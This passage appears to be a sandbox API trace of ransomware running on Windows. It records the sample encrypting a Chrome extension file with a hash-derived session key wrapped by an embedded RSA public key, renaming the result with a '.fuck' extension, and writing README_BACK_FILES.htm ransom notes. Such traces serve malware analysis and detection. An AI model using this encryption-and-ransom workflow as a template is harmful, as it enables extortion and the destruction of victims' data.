[0264.457] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.457] GetLastError () returned 0x0 [0264.457] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json")) returned 0x20 [0264.457] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x80) returned 1 [0264.457] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.458] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.459] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.459] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.461] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.461] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.461] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.461] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0264.461] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.461] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.461] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e75aa0) returned 1 [0264.462] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75aa0, dwCertEncodingType=0x1, pInfo=0x2eaf570*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf5a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf5a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7edc0) returned 1 [0264.462] CryptEncrypt (in: hKey=0x2e7edc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.462] CryptEncrypt (in: hKey=0x2e7edc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75ee0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75ee0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.462] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e75ee0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75ee0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.463] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.465] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.465] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.480] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.480] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.480] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.480] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.480] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.480] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.480] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.481] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.481] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.481] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.481] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.481] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.481] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.481] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.481] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.482] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.482] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.482] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.482] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.482] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.482] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.482] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.482] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.482] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.482] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.482] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.482] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.482] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.483] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.483] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.483] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.483] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.483] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.483] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.483] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.483] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.483] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.483] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.483] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.483] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.483] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.484] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.484] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.484] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.484] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.484] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.484] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.484] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.484] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1f2, lpOverlapped=0x0) returned 1 [0264.484] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1f2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x200) returned 1 [0264.484] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x200, lpOverlapped=0x0) returned 1 [0264.484] CloseHandle (hObject=0x5d5c) returned 1 [0264.484] CloseHandle (hObject=0x5d60) returned 1 [0264.485] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), bFailIfExists=0) returned 1 [0264.488] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x0) returned 1 [0264.488] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.gsg")) returned 1 [0264.490] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.fuck")) returned 1 [0264.491] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0264.491] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0264.491] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.491] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.492] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0264.492] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\readme_back_files.htm")) returned 0xffffffff [0264.492] AreFileApisANSI () returned 1 [0264.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 165 [0264.492] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.493] GetFileType (hFile=0x5d64) returned 0x1 [0264.493] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.494] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0264.494] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0264.495] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\readme_back_files.htm")) returned 0xffffffff [0264.495] AreFileApisANSI () returned 1 [0264.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 159 [0264.495] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0264.496] GetFileType (hFile=0x5d50) returned 0x1 [0264.496] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0264.497] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0264.497] FindFirstFileA (in: 